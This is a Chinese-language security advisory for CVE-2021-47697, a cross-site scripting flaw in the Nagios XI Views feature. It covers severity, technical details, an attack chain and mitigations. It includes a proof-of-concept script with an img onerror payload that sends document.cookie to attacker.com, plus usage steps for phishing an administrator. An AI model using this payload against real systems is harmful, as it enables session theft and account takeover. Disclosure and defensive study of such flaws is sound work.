CVE-2021-47697 Nagios XI Views功能跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2021-47697

漏洞类型

XSS跨站脚本攻击

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Nagios XI

漏洞概述

CVE-2021-47697是Nagios XI软件中的一个中危跨站脚本（XSS）漏洞。该漏洞存在于Nagios XI的Views功能模块中，由于对用户输入的URL参数缺乏充分的验证和过滤，攻击者可以通过构造恶意的URL参数注入任意JavaScript代码。当其他用户访问包含恶意脚本的链接时，这些脚本将在受害者的浏览器上下文中执行，从而窃取会话Cookie、劫持用户会话或执行其他恶意操作。漏洞影响Nagios XI 5.8.0之前的所有版本，CVSS评分为5.4，属于中等严重程度。攻击者需要诱导用户点击恶意链接才能成功利用此漏洞，这降低了漏洞的实际危害程度，但仍需管理员高度重视并及时修复。

技术细节

该XSS漏洞源于Nagios XI的Views功能对URL处理时的输入验证不足。具体来说，当用户访问包含特殊构造参数的URL时，这些参数值未经适当转义或验证即被直接输出到HTML页面中。攻击者可以通过在URL参数中注入<script>标签或事件处理器（如onerror、onload等）来执行恶意JavaScript代码。由于Nagios XI通常以高权限运行，成功的XSS攻击可能导致获取管理员权限或访问敏感监控数据。漏洞的利用需要用户交互（UI:R），攻击者通常通过钓鱼邮件或社会工程学手段诱导目标用户点击恶意链接。修复版本为5.8.0，建议所有用户尽快升级。

攻击链分析

STEP 1

步骤1

攻击者识别目标Nagios XI服务器，确认其版本低于5.8.0

STEP 2

步骤2

攻击者构造包含XSS payload的恶意URL，利用Views功能的URL参数注入漏洞

STEP 3

步骤3

攻击者通过钓鱼邮件、即时消息或其他社会工程手段诱导目标用户访问恶意链接

STEP 4

步骤4

目标用户点击链接后，恶意JavaScript代码在其浏览器上下文中执行

STEP 5

步骤5

攻击者通过XSS成功窃取用户会话Cookie、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2021-47697 PoC - Nagios XI XSS via Views URL Handling -->
<!-- This PoC demonstrates the XSS vulnerability in Nagios XI Views feature -->
<!-- Replace TARGET_URL with the actual Nagios XI installation URL -->

<script>
// PoC for CVE-2021-47697: Nagios XI XSS via Views feature URL handling
// Target: Nagios XI < 5.8.0

function exploitXSS() {
    var targetBase = 'https://TARGET_URL/nagiosxi/views/?';
    
    // XSS payload - steals session cookies
    var xssPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">';
    
    // Construct malicious URL
    var maliciousUrl = targetBase + 'view=custom&name=' + encodeURIComponent(xssPayload);
    
    // Alternative payload using event handler
    var altPayload = '" onload="alert(document.cookie)" data-x="';
    var altUrl = targetBase + 'view=test&param=' + encodeURIComponent(altPayload);
    
    console.log('Malicious URL:', maliciousUrl);
    console.log('Alternative URL:', altUrl);
    
    // In real attack, would redirect victim to maliciousUrl
    // document.location = maliciousUrl;
}

// Execute when page loads
exploitXSS();
</script>

<!-- 
Usage:
1. Replace TARGET_URL with actual Nagios XI URL
2. Host this PoC on attacker-controlled server
3. Send phishing link to Nagios XI administrator
4. When admin clicks link, XSS payload executes
5. Attacker receives admin session cookie
-->

影响范围

Nagios XI < 5.8.0

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web服务器层面配置XSS过滤规则；2) 禁用不必要的Views功能模块；3) 对管理员进行安全意识培训，提高对钓鱼攻击的警惕性；4) 实施严格的CSP（内容安全策略）限制脚本执行；5) 监控Nagios XI的访问日志，及时发现异常请求。